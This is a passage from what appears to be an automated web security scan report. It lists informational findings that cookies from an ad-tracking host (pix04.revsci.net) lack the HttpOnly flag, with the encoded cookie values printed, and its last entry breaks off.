rsiPus_evMS="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe3XM9OR5om4StALLEl9sEMwvnCoBpIccfVs6urDw05fHt6PfSqbiWNXR/jCjVKUWrTvUIbcsKagvwG10PsbYIMpsXG1ZYgPGTNKk4xnTkFyZxw+3FBOTrvF5jks9+JkzB/hR0Tkd4oX42bdny92IEJPNNLWe4yV1PTfZSRvnppCJRLCL2ohVJyVYoEVPVkJW78T5TlLreZ2H8/nAR4ctiOctGhaXEazbuzgI0h4pAHsKQIW1G4X4wUVUG5pLlBZNsLTGLu1ilset+uOhC1jNfafldX2PUk1bqmDkVtoM/Skeh91IHEnyyzjkJS7wz6UGgDFsf7IMHHlhGaJ8LrLZ6vygejeyfId1Qcu1uBIBwl6vqu9zmYAgdZ7z8fM3lHostCyPZMFO3BCJ32NO4epSB3BWTkLnwwbQHIDzRUyBRsVAvco8x/LaLOqIFa5vxRY/FjbTt6EZbR+Chh+3x1rS10fzv0zBCcorVoYeH/aQm3ow62YSuwYfMDfZ1RhABUQTnVtlmce15Rxsn2OCBUh+6toejr4T2cDhLXZC69XGDU0PpetZVISrXJ4APF9qsWT77F4wLT4zo6cpo7nRrXpTeNNVU6qfYojwNmWL9eawbGrcVupb3kxWdodWQHy7NTvvw5wjTnXvtmyup8hmB9BqRRtQAS4O4Il259CpV4eRoLgpYo1P2qbzL2sJNgl/Ot5L7tBx3D/soQ1JxEIy613DpS1O0fsKZsW3icNUN/FW+NvfQOaBo5LjzHNy48hySDs+mrPzGCKpsVAq5cgqjYZhN4F52CzNb+3x3nvRkya1M9stHfQus7Ru3jtmyYNgGNMa1V68/dVtrCpITqbV7HHbjLHvlABV/WvRb2OSaMJ4MAbP9aKDdOFQbjOlSbxpRBnqsjyF0Rn9ZCHS2SMk3OFlJ627v6e/JX6rs8tRij7XeS1DvJYIOUyRCiDcaOr2NOlABeK5Qs9V1xN2Xbl9utsOZzninCy5NtTZjxkXDwJxXGvEdjxayqUPD/pJ9NK6E1dup/apyccF5E3TidzG4q/8bqos250kNmw1xYaJumj9mEqR4YSYnBANPhk+VzZcgjK0LcWf9TTLIfUjZB/p9sg5tH9jbnJmAD10ujoXfkvn0NUUoIDNzKtEcKq6SfjwwKgPxKFsvWtmBBij5xKGVtai3hvbxu+VPAob5D0mC23kZJhmgvS+JZO1Nlby9ytNQ8Nq1NIEHqsouw3MXa+LQwlVvk69Z3FAp1Urw5cq0R8Zzx1iEHDUQW2XLL+KtE4gzDXpUs43F/KzmwLcWNUld85lLv+Zs4+2SFI38K/UChrS/uhsXQ"; rsi_us_1000000="pUMV4ymnMBYY7dXKYa4+QIxDgvM/u/LBmb+24q2tXApJiFT0/ChXTUHNBmbDd46t2hFxDCMVaHP4CLq/pZMuoy/ewcD0FX/sKZKTRO7VZ6iPmAiSltSt2s1xurZiR6H24UqyA+Nh2RxjsZeCiFKkk80FLO19B2NlUVN7jrYLH0NcEDW/dc9rzfg7YbyYtEmGqNoKYa5yINjN6e64XwCx4D46jpq6oGI1IZqA3DT3sEnoRJjrPK5azHeuT4nS5vioYImIWn6v3MgSK/RzrDRuAJ9j91dfPNrNfMwdtaDxsR4w4lhnkcahqc2S0BIsn/oyUca/oeTJoQYbwJLsCkiNcMLywz7ZEwnFltdeQOuk1ywxzFOjbg6cfyoxSipYtVjffF7qgITHxcUPT68KNERXMGy+sRKFMQLmeTrdopWZ+1obDjU9/BEAlmJJDLfStO73D27JrDXhrV74uzGERS6h+diijLK75rsaUimseoXwgkl9f4+GeEKI+oEsL4cD/Er0Jg2xRn0TDMY/6HNdLWgdbMF0OTvjnpUeokDF6xcBZRb6ZkGzKTyP9KKrv9f4nmLcxgiwCcguTfu9whhbnlGGiH8sG0kXhP7cBJQprkfqHWxAV5/VukNuzc51qmMzHTKgS0vAwiMvaOSBzvr+LsGh0q5cCKXNbFxLpkQnCitO5j+EBFKWHBE1dbS3z/CiiumJtsDuLFny+6XTFHQx9un0UaEF3Hi4Cn6ZOHY5/DKYyrighviQF7pnMxn0AW0HC6YBeE0Z+48oX+gYVyfMi63VXQoke8h/7W2zU2vN6hMbuhSi/obO8bhOUxNgbfkz+vZwXvf6pPxDaZNxsBR+Clwg4vzXg+Uujg2VkfE1QOkdxCKQUvJiX8Gn5CEfkWDFAyIDkIvHrqZtMNrhyNcl98LTb346dAwOwysbzdoh72IBwFnMAeLBhOWXvCSQNlCmlGDNsOfLen2jioPuq5L0lOONkfTqB/g/KK5rR+9cfyZCtpaiCmMSdDpgHdUuCdCXBN/omF6OdlPGYeUcOLEAaquHaGPrTWpbOQ0HGtSP7yfNv0XvGDw6ajlb0l+l8bB/mvXv2SILU062vN9JU++IWvixYNTL9RUomOVux4EU2cJ2sLFszBVubsN1kPUduNKVVw2X0a6dXuhq4qoUW11T6Kyb7dO4m1AbBRrItbPKZi3KdVnQWKicY3QreXyXa7A9NQcvUkbOkE65wOLek+qqT0HDiWaheBzY+dX+jb12QkG3eyrMWDkxFEbzHnXSi+/DhGtr36p4KTjfKGl9Bs1WgN42NWJ2FniUaeyiDvYXQ8ypkErggFNtDtcnjbPQ+h83ld+1XqRT3lTbbXfEOEy39JI3wIVsCxJesH7MFrKtOMDpJXBianiJYXm1MLpOAYQ5M9mK/9rfnhk0VY+Qf8s7QPXBFje+NPjRkGFrocHy4UDzXaW2+2hBDvcOrnJbsgcUe4i/oLDVcOpsxsmW8IS6OMYRkwPdmYgGL5YfRYEKjMsUbmy67Gc2dTg7Y9LTFVnADWyRnzAezIS+NW7wqLkXh4/OzXH9QQWqikfI6wpW9rOG7+vUd3Qoia1crbjTt+gSk2hvt+cVWSF2Fl3akOyZIZyuHBxrsClCfQgStQQmEiNaOXo9zDpzde90duK+NvVriCbGPj9EE7hhcxkgghiN6pIJ6OXaxkG/bXonImQXovRVDCk4kzDJ9VGH3cSj9+1zz8ZP32r48sxAhklxuKayLxCyMX8gmEZ+aHvMTkGDrKSD7FwzFnHyGJpXP1jJgrDSHoeaAkoAFW2UGq5hVOeJ"; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rtc_HHwW=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; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0H/wC6LifrWDbWiI6t+ib4fuctjH0iWzAw3r14JwP/YYUQ4WilEZa1mDBgWbOLLoFbDs08LFTYab0cAaYOpnwIMBLA0IVDPklGA4cG8987irB0kMgiihI/CdBBO2IqsXUHg2YYHfbCkyKF/JXks5u+heEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxar0dCcOUA19iyGVNLDYDF86x87PdcgYejEsUMdc2duPgOIx4rC7FyfGZpR7epenDDvIYvU27qvwht6FQASYws3bEqTCb6mh0vFu5mvpdO4Udxbi82Cefxrkn719aIy9jTs/j190fKBmuvneHzYUAbZrp/w4AWXx+B1xcSCzmqNXnQdxvE1u8CDQ6fomI7wLLZOpqxelSmMxVQcSqdZLuwaQkZ0G/fTtom6rHLB3puxqYNgfNz18Pf8KlbRQ0SiXV5qtNJuL73QuW3oopJQ1xawIfLPUMk+8u+7xBJawP8YGs0z21vn/sw6GjJNSDMoNer9wJzf177FS9qB2fuwGqfvpMtbkArqLW7xFKhxyOjBZ1Qg9m0NSsLeGCpgCBaT2fhhM01rwFzWAkPTKTALMaeJdekiuw7FZnvSCOA=

Response

11.154. http://pix04.revsci.net/D10889/a1/0/3/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10889/a1/0/3/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0H/wDKLif3WDbWiI6t+ib4fuctjH0iWzAw3r14JwP/YYUQ4WilEZa1mDBgWbOLLoFbDs08LFTYab1kEEVPU2fUru16M3xQvK5h6DjhbsoxFL9mZy09tkwF3zMBONWLPim13tsUnt7y69yzn/pSli2dtkys7CO8F3vwD23Obc5M84e0F+4OWToqI5U+iuxfrQum9nIixS2GVNLDYDF86x87PdsgAeYppmygfGdueJTTQXCQMngfB9WEvi03TLVbfAWq2zlNM5vONWWpLOcleZnY+RfYGxr8J1WKr3kKwTZDvKy5rS88GUZK/SOYz+VlIEXJKojrvVMBwVv3NDbKjKvx6WiaVybXlB8I2oOt67pWCeFCI0f7C+xSoPqQOVoIx5X3c/T2fUxL+ZzL6mUvnWl5qy82+gwLkuSPK2V+8NfMuldW1N+oe1Zs+PtLgJiJou7he5zbnElFxjxkD+HICyrTWabZP61L+ADsG0yNdjbJ3hQDq0wjlZWKZwHAPRvbdi4n1m8DStqB2fu4RZjcpstbkArqLW7xFGhhI/C5/A9z9lAJSsLeeC4A8oWt4vhhM81kGxLWDrX5plbwP6fxFss2/w7FZouRCOw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:22:39 GMT; Path=/
rtc_78xD=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; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:22:39 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.155. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/E06560/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPTrTFTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0wwnt14JwP+YcsIwSmkFOWlzUMTmbjeI5py/GeW6vTjQ8ktlzVfsKdjSdKUW1ejPcGkrIUMmJ/oBB7d/OAfDEuJfnOUCNWLPIM7caSHwIGF5AYAZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7TB2NMhNPN79A2huyqlNthUg8L/sfzZK6uEPDs3kNnwyTO8oxSKaRZV8TluurTIekROhiO5vzTgpOdHTZm6U+pH9eWOHzNASrq2YbE5q9TTg2L+V4kxdvVOakbMEg7mrhpBBm5sRyOtyMwDjf2i8M4DIGPTsTRKDtUa9gunknbf/xK7rf/UGHTSt2Hv1K41b7f/pMiKLo478io+Vk+rdp+BX7nMiTGgJC8qmDUhyyKMVH2Yt46IUv2zHxvuidsn1oGg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:08:41 GMT; Path=/
rtc_k8zl=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; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:08:41 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.156. http://pix04.revsci.net/G07608/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G07608/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfq5QsJKQ25ayViGymJW18v6oxo5TQQ/CGgK6H8il2W9fxKJhTycj5xS4V0a4TNPNDPv1QWh8gkmOOsH9rraddoccklFmNdAYOTGYvtIJB6bP4P6/Il+5XrH+SP65GfIkcTktT+ixZsRa1DGnHu9HmUsTwsj+b4TSHPCO16C5RAiiAQYMQkaugeRM6rM/rSpP7RG7CFImDEIo+ZBxqIBIeZ+v3cM8F6iRLQzaH1DXQZr18dGmrbf+V7QUoiZ0gWnenJxJJMyQWZ0z/uI+KrnzxNnfHDxF+JCvmJDRN+8iExCSVxXVcEuEzVns7DeeHbBmOE8SRm++crK0omvqP/CfGX/DbBUxp1a3nt6JIJOhMBXHohM3DmzPoKuWuptd0Ma4U3S/mvJMjNaGZ+h2R3rHVICpO0sF6nd/LPqsbK3vOkk8FWqANAReKveX6vv424aoESBdu1mR6KA7WmNW+Zwj+rJJvKXOPsWdBzMbj02qJxZnLSwD3C5ODnISsuK0Rw1af7v3s2u6sHlE3HiAdJp/GqcuQhOyTW3qYudZXum8EjHSamUCkFqdy9wcuvk6ZamKiglqUheua638AObL0rMRx+eowSq/lw9vb3yh++2J+axlFbzsjJbwrS90p1UmzQuU47NxiHAg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:22:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.157. http://pix04.revsci.net/I10985/b3/0/3/1008211/111571878.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/111571878.js

Issue detail

